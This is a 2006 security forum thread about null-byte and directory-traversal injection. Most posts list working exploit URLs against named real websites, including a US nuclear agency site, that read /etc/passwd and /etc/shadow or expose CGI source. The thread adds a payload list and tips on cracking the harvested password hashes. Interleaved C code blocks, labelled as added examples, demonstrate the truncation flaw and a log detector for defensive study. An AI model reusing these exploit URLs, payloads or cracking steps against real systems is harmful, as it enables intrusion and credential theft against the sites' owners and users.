Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
So it begins - Null byte edition
Posted by: jungsonn
Date: November 17, 2006 11:39AM

Gha.

http://tactile.nrcan.gc.ca/page.cgi?url=page.cgi%00.html

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 18, 2006 09:40AM

http://www.richters.com/newdisplay.cgi?page=newdisplay.cgi%00.html

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 18, 2006 09:40AM

http://www.cppgameprogramming.com/cgi/nav.cgi?page=nav.cgi%00.html

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 18, 2006 09:41AM

../%00 works fine:

http://www.accessola.com/site/showPage.cgi?page=../%00

Re: So it begins - Null byte edition
Posted by: rsnake
Date: November 18, 2006 07:00PM

Nice! I haven't seen null byte injections for a while. I'm glad to see people are still using PERL, even if they are getting screwed by it. :) Those could easily lead to server compromise.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 19, 2006 01:46PM

Yeah, indeed. I thought about something like this: redirect.cgi?page=/etc/passwd%00 or something.

Haven't found one yet, but that's a question of time.

Re: So it begins - Null byte edition
Posted by: maluc
Date: November 19, 2006 02:10PM

Someone care to explain null byte exploiting in more detail..? I.e. what you can do with it.

And does it only affect websites with a Perl backend?

-maluc

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 20, 2006 01:32AM

A null byte affects most programming languages, even PHP
(like regex functions that are not binary safe, e.g.
it skips everything after the null byte).

A few i know of:

Directory traversal (CGI):
like: ../etc/passwd%00

XSS Null Byte:
search=<%00script>

File Uploads:
file.exe%00.jpg

SQL/PHP Injection:
id=1%00 INSERT INTO TABLE

Re: So it begins - Null byte edition
Posted by: maluc
Date: November 20, 2006 02:33AM

exactly what i was looking for, thanks

-maluc

Re: So it begins - Null byte edition
Posted by: rsnake
Date: November 20, 2006 10:37AM

The original null byte text was out of Phrack 55. Basically it's like this: if you have code that is looking for a string "root" and says 'do x as long as user != "root"', and you inject root%00, you have circumvented the string. Then it will perform the function as root%00, and as the null is a string terminator it is silently dropped. It affects more than PERL, as jungsonn explained.

- RSnake
Gotta love it. http://ha.ckers.org

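RSnake's root%00 description and jungsonn's list of affected contexts come down to one mismatch: the interpreter's string carries a length, while the C library call underneath stops at the first NUL. The program below is an added example written for this page, not code from the thread or from any of the sites listed. It models the Perl idiom open(F, "pages/$page.html") at the point where the string reaches the C library: a length-based path builder (build_path_naive) reports what it thinks it produced, effective_path_len shows what open() would actually receive, and build_path_safe is a hardened allow-list builder placed beside it. The pages/ directory, the .html suffix, the 64-character name limit and all function names are assumptions for the demo.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example (not from the thread). Perl tracks string length, so the
 * decoded value "page.cgi\0" is 9 bytes to Perl, but open(2) receives a
 * NUL-terminated char* and stops at the first NUL. Directory, suffix and
 * name limit are assumptions for this demo. */

#define PAGE_DIR "pages/"
#define SUFFIX   ".html"
#define DIR_LEN  (sizeof(PAGE_DIR) - 1)
#define SUF_LEN  (sizeof(SUFFIX) - 1)

/* Vulnerable builder: concatenates by length, as the interpreter does, and
 * returns the byte count it believes it produced (terminator excluded).
 * Returns 0 if `cap` is too small. */
size_t build_path_naive(const unsigned char *page, size_t page_len,
                        char *out, size_t cap)
{
    size_t total = DIR_LEN + page_len + SUF_LEN;
    if (total + 1 > cap) return 0;
    memcpy(out, PAGE_DIR, DIR_LEN);
    memcpy(out + DIR_LEN, page, page_len);
    memcpy(out + DIR_LEN + page_len, SUFFIX, SUF_LEN + 1); /* copies the NUL too */
    return total;
}

/* What the filesystem actually receives: the C string up to the first NUL.
 * When this is shorter than build_path_naive() reported, the suffix was cut off. */
size_t effective_path_len(const char *path)
{
    return strlen(path);
}

/* Hardened builder: allow-list the page name before appending anything.
 * Embedded NUL, separators, dots, percent signs and empty or oversized names
 * are all rejected, so the suffix can no longer be truncated away.
 * Returns 1 on success, 0 if the name was rejected. */
int build_path_safe(const unsigned char *page, size_t page_len,
                    char *out, size_t cap)
{
    if (page_len == 0 || page_len > 64) return 0;   /* 64: assumed site limit */
    for (size_t i = 0; i < page_len; i++) {
        unsigned char c = page[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '_' || c == '-';
        if (!ok) return 0;
    }
    return build_path_naive(page, page_len, out, cap) != 0;
}

int main(void)
{
    /* Constructed input: the decoded form of page=page.cgi%00 (9 bytes incl. NUL). */
    static const unsigned char evil[] = "page.cgi\0";
    const size_t evil_len = 9;
    char path[128];

    size_t reported = build_path_naive(evil, evil_len, path, sizeof path);
    printf("builder reported %zu bytes; open() would see \"%s\" (%zu bytes)\n",
           reported, path, effective_path_len(path));
    printf("safe builder %s the same input\n",
           build_path_safe(evil, evil_len, path, sizeof path) ? "accepts" : "rejects");
    return 0;
}
```

The naive builder reports 20 bytes for "pages/page.cgi\0.html", but strlen() on the same buffer gives 14, which is exactly the truncation the thread's page=page.cgi%00.html URLs exploit: the script's own source is served instead of a .html page. The safe builder never reaches the concatenation for that input because the allow-list rejects the NUL (and the dot), which is the fix rather than a blacklist of "../".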
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 21, 2006 01:34PM

Yah, scary passwd file:
http://afi.yournetplus.com/showpage.cgi?p=../../../etc/passwd%00

Just messed up cgi:
http://afi.yournetplus.com/showpage.cgi?p=../showpage.cgi%00.html

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 21, 2006 01:34PM

Yet another scary passwd file up for grabs:
http://www.inav.net/showpage.cgi?p=../../../etc/passwd%00

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 21, 2006 01:35PM

And another:
http://www.surfsation.com/showpage.cgi?p=../../../etc/passwd%00

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 21, 2006 01:44PM

Hm.. this gets boring.
http://www.mwci.net/showpage.cgi?p=../../../etc/passwd%00
http://www.veriqik.com/showpage.cgi?p=../../../etc/passwd%00
http://www.neonbob.com/showpage.cgi?p=../../../etc/passwd%00

Re: So it begins - Null byte edition
Posted by: maluc
Date: November 21, 2006 02:19PM

yay for google dorks ^^

-maluc

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 21, 2006 02:26PM

Ghe.. looks like one person built those sites.

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 27, 2006 11:02AM

I'm glad nuclear power security is in good hands, so we can sleep like a rose:
https://www.nemre.nnsa.doe.gov/cgi-bin/prod/shared/index.cgi?Page=../../../../../../etc/passwd%00&NavBar=off

Just messed up:
http://jp-bridge.com/page.cgi?url=page.cgi%00.html

Or just saves files to your desktop:
http://valet.webthing.com/link/link.cgi?url=link.cgi%00
http://www2.cybair.com:8080/exchange/link.cgi?url=link.cgi%00
http://chemstat.com.ru/cgi-bin/redir.cgi?url=redir.cgi%00.html

This one goes fast (redirect) but it shows the cgi file, so click stop.
http://www.investcom.com/cgi-bin/redir.cgi?url=/mutualf/calculator.htm&frame=redir.cgi%00.html



Edited 1 time(s). Last edit at 11/27/2006 11:15AM by jungsonn.

Re: So it begins - Null byte edition
Posted by: digi7al64
Date: November 28, 2006 12:15AM

@jungsonn

Ballsy effort on the nnsa.doe.gov site.

However, I can't really say that I agree with you posting it. Whilst I have disclosed reflective XSS holes on a number of sites, I always try and be responsible with what and how I post... (for instance no SQL injections, no gov sites, no commercial grade applications that can affect lots of users etc.) and in this case I think responsible FD to the administrator would have been the better option.

It's not to say I don't agree with what you have posted; any agency in charge of any nuclear data should be more accountable and secure than everyday sites.

The problem is the criminal element that lurks around these sites and now knows about this hole... and I would suggest that, as we speak, they are already trying to rootkit/backdoor etc. the site for information and/or the internal networks it could be connected to.


Either way, for what it is worth, I think you can now consider yourself tracked, and with you already having published your website URL it will be fair to assume you shall be receiving a visit shortly.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 28, 2006 01:07AM

I understand and feel what you're saying, though maybe it's already been hacked for 3, or maybe 8, years. Who knows how long that hole has existed. Many things go unnoticed until someone who is passing by sees that someone's front door is open and rings the bell at all the neighbours'.

I've reasoned before that I'm not going to differentiate between found sites; I either post them or not, without looking at the actual content on them.

Yep, that means they have to re-install the whole damn server to be sure there are no backdoors installed by now.

Everybody is welcome in my home :)

Re: So it begins - Null byte edition
Posted by: maluc
Date: November 28, 2006 01:46AM

I agree that he more than likely got himself an FBI file now if he didn't already have one - but I'd be surprised if they paid a visit in person over it. (Unless of course you tested the 'validity' of those passwords.) The action can definitely be construed as illegal - but luckily in America I think we have to prove intent (IANAL).

So I don't think he needs to go call up his lawyer right now. If I find similar holes I'll probably do the same and fully disclose them. Hopefully they learn their lesson from it, and put more emphasis on securing their site - particularly being part of the National Nuclear Security Association.

I really don't think full disclosure should be illegal when there is no malicious intent. But my guess is politicians will make it illegal, since they don't understand it.

a good find regardless.

-maluc

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 28, 2006 01:57AM

One thing I know 4 sure: I ain't going to eat sushi this week.

Re: So it begins - Null byte edition
Posted by: rsnake
Date: November 28, 2006 10:54AM

Okay, cool... ALL SPIES, PLEASE NOTE, Jungsonn will not be eating sushi this week. Please poison him next week. Thank you. That is all.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: November 28, 2006 03:55PM

Yah, heck, I never eat sushi :)

But according to Tias i could always start my own shop:
http://www.tias.com/makeashop/index.cgi?page=index.cgi%00.html

Re: So it begins - Null byte edition
Posted by: Ghozt
Date: November 30, 2006 11:15PM

I'm glad to see the NEMRE fixed theirs. I also noticed that most servers will feed you the passwd file without the null byte.

http://www.aboutit.co.nz/Iminit/servlet/Serve?file=../../../../../../../etc/passwd
http://afi.yournetplus.com/showpage.cgi?p=../../../etc/passwd
http://www.inav.net/showpage.cgi?p=../../../etc/passwd
http://www.surfsation.com/showpage.cgi?p=../../../etc/passwd
http://www.mwci.net/showpage.cgi?p=../../../etc/passwd
http://www.veriqik.com/showpage.cgi?p=../../../etc/passwd
http://www.neonbob.com/showpage.cgi?p=../../../etc/passwd

Huge: http://www.brustkrebs.de/scripts/print.php?file=../../../../../etc/passwd



Edited 1 time(s). Last edit at 11/30/2006 11:17PM by Ghozt.

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: December 01, 2006 08:08AM

Yes indeed Ghozt, some do and some don't show with or without the null byte. Most of the ones I found only showed with the null byte. Granted that in this case it wouldn't matter much.

nice finds BTW!

Re: So it begins - Null byte edition
Posted by: Ghozt
Date: December 01, 2006 04:05PM

jungsonn, those are all the ones that you found. I just took the null byte out and posted them again.

--Well, except for aboutit.co.nz and brustkrebs.de.
http://www.virtuallabs.de/vl.php?file=../../../etc/passwd

Shadow files:
http://www.aboutit.co.nz/Iminit/servlet/Serve?file=../../../../../../../etc/shadow
http://www.virtuallabs.de/vl.php?file=../../../etc/shadow



Edited 1 time(s). Last edit at 12/01/2006 04:32PM by Ghozt.

Re: So it begins - Null byte edition
Posted by: Ghozt
Date: December 01, 2006 05:23PM

http://www.aquariusaroma-soap.com/cgi-bin/s_321_ch.cgi?user_id=id&database=catalogue.exm&template=../../../etc/passwd&1_option=3&1=Lamps
http://www.aquariusaroma-soap.com/cgi-bin/s_321_ch.cgi?user_id=id&database=../../../etc/passwd&template=products/cosmetic.html&1_option=3&1=Cosmetic-Base (Gives error instead of showing file)
http://www.adlinktech.com/big5/investor/home.php?file=../../../../etc/passwd
http://www.sandeepnet.com/index.php?file=../../../../etc/passwd
http://www.assured.com/cgi-bin/as_site_manager.pl?file=../../../etc/passwd
http://highmanagement.net/Soluciones/RecursosHumanos.phtml?file=../../../../../../etc/passwd

There are a lot more I'm sure, but I haven't seen any that need the null byte, so this is just file disclosure.

Re: So it begins - Null byte edition
Posted by: adam
Date: December 01, 2006 06:14PM

I thought the shadow file had the actual passwords in?

Adam

Re: So it begins - Null byte edition
Posted by: maluc
Date: December 01, 2006 07:00PM

Sometimes it's in /etc/passwd, sometimes in /etc/shadow. This should answer most of your questions, so I won't repeat it: http://en.wikipedia.org/wiki/Shadow_password

But they only have the encrypted hashes (usually DES), which can be cracked with John the Ripper afterwards. DES cracking is slow, so I really recommend you find yourself a large dictionary file first to test against.

-maluc

Re: So it begins - Null byte edition
Posted by: jungsonn
Date: December 01, 2006 07:54PM

In the passwd file, if you see X or * it is shadowed, and then there's nothing you can do about it.

But with directory traversal, it's common to filter against that. With a null byte at the end, the chances are higher for disclosure. So /etc/passwd%00 would prove to be more successful in many cases than /etc/passwd when ordinary traversal doesn't work.

The passwd traversal was a mere option to explore the ways of null bytes.
Having said this, it wasn't my initial idea, 'cause if you could traverse a directory, then there is something very wrong in the first place.

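jungsonn's last point, that a traversal filter is beaten more often once %00 is appended, is really an ordering problem: the check runs on the percent-encoded text while the file open runs on the decoded bytes, and a length-unaware check never sees the NUL at all. The program below is an added example written for this page, not code from the thread, showing the defender's counterpart: decode first with an explicit length (url_decode), then classify the bytes (classify_param), and run the same classifier over access-log lines (scan_log_line) so that %00, %2e%2e%2f and literal ../ variants are all caught in detection as well as at the input boundary. The common-log-format layout, the three sample lines (built from the thread's own showpage.cgi?p= pattern with documentation IP addresses), the flag names and the function names are all constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Added example (not from the thread): decode first, then inspect the
 * decoded bytes with an explicit length, never with strlen(). */

static int hexval(unsigned char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = (unsigned char)tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decodes %XX and '+' as a CGI library would and returns the decoded length.
 * The output may legitimately contain NUL bytes. */
size_t url_decode(const char *in, unsigned char *out, size_t cap)
{
    size_t n = 0;
    for (size_t i = 0; in[i] != '\0' && n < cap; i++) {
        if (in[i] == '%' && hexval((unsigned char)in[i + 1]) >= 0
                         && hexval((unsigned char)in[i + 2]) >= 0) {
            out[n++] = (unsigned char)(hexval((unsigned char)in[i + 1]) * 16
                                     + hexval((unsigned char)in[i + 2]));
            i += 2;
        } else if (in[i] == '+') {
            out[n++] = ' ';
        } else {
            out[n++] = (unsigned char)in[i];
        }
    }
    return n;
}

/* Bit flags (names are my own) describing why a decoded value is suspicious. */
enum { SUSPECT_NUL = 1, SUSPECT_TRAVERSAL = 2, SUSPECT_ABS = 4 };

/* Runs on decoded bytes, so "%00", "%2e%2e%2f" and a literal "../" all register. */
int classify_param(const unsigned char *v, size_t len)
{
    int flags = 0;
    if (len > 0 && memchr(v, '\0', len) != NULL) flags |= SUSPECT_NUL;
    if (len > 0 && v[0] == '/') flags |= SUSPECT_ABS;
    for (size_t i = 0; i + 1 < len; i++) {
        if (v[i] == '.' && v[i + 1] == '.' &&
            (i + 2 == len || v[i + 2] == '/' || v[i + 2] == '\\'))
            flags |= SUSPECT_TRAVERSAL;
    }
    return flags;
}

/* Scans one common-log-format line: pulls the request target out of the
 * quotes, decodes every query parameter value and ORs the flags together.
 * 0 means nothing suspicious (or no query string at all). */
int scan_log_line(const char *line)
{
    const char *q1 = strchr(line, '"');
    if (q1 == NULL) return 0;
    const char *q2 = strchr(q1 + 1, '"');
    if (q2 == NULL) return 0;
    const char *qs = memchr(q1, '?', (size_t)(q2 - q1));
    if (qs == NULL) return 0;

    int flags = 0;
    const char *p = qs + 1;
    while (p < q2) {
        const char *end = memchr(p, '&', (size_t)(q2 - p));
        if (end == NULL) end = q2;
        const char *sp = memchr(p, ' ', (size_t)(end - p)); /* before "HTTP/1.x" */
        if (sp != NULL) end = sp;

        const char *eq = memchr(p, '=', (size_t)(end - p));
        const char *val = eq ? eq + 1 : p;
        char raw[512];
        size_t raw_len = (size_t)(end - val);
        if (raw_len >= sizeof raw) raw_len = sizeof raw - 1;
        memcpy(raw, val, raw_len);
        raw[raw_len] = '\0';

        unsigned char dec[512];
        flags |= classify_param(dec, url_decode(raw, dec, sizeof dec));

        if (sp != NULL) break;
        p = end + 1;
    }
    return flags;
}

int main(void)
{
    /* Constructed sample lines, not real traffic. */
    const char *lines[] = {
        "203.0.113.5 - - [21/Nov/2006:13:34:00 +0000] "
        "\"GET /showpage.cgi?p=../../../etc/passwd%00 HTTP/1.0\" 200 1843",
        "203.0.113.5 - - [21/Nov/2006:13:35:00 +0000] "
        "\"GET /showpage.cgi?p=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.0\" 200 1843",
        "198.51.100.7 - - [21/Nov/2006:13:36:00 +0000] "
        "\"GET /showpage.cgi?p=about&lang=en HTTP/1.0\" 200 512",
    };
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        int f = scan_log_line(lines[i]);
        printf("line %zu: flags=%d%s%s%s\n", i + 1, f,
               (f & SUSPECT_NUL) ? " [embedded NUL]" : "",
               (f & SUSPECT_TRAVERSAL) ? " [dot-dot traversal]" : "",
               (f & SUSPECT_ABS) ? " [absolute path]" : "");
    }
    return 0;
}
```

The first sample line reports both flags (NUL and traversal), the hex-encoded second line reports traversal only, and the benign third line reports nothing. The same classify_param call belongs in the CGI itself, before any path is built, which is the point jungsonn's filter-bypass observation makes from the other side: a filter that matches "../" on the raw query string is looking at the wrong representation.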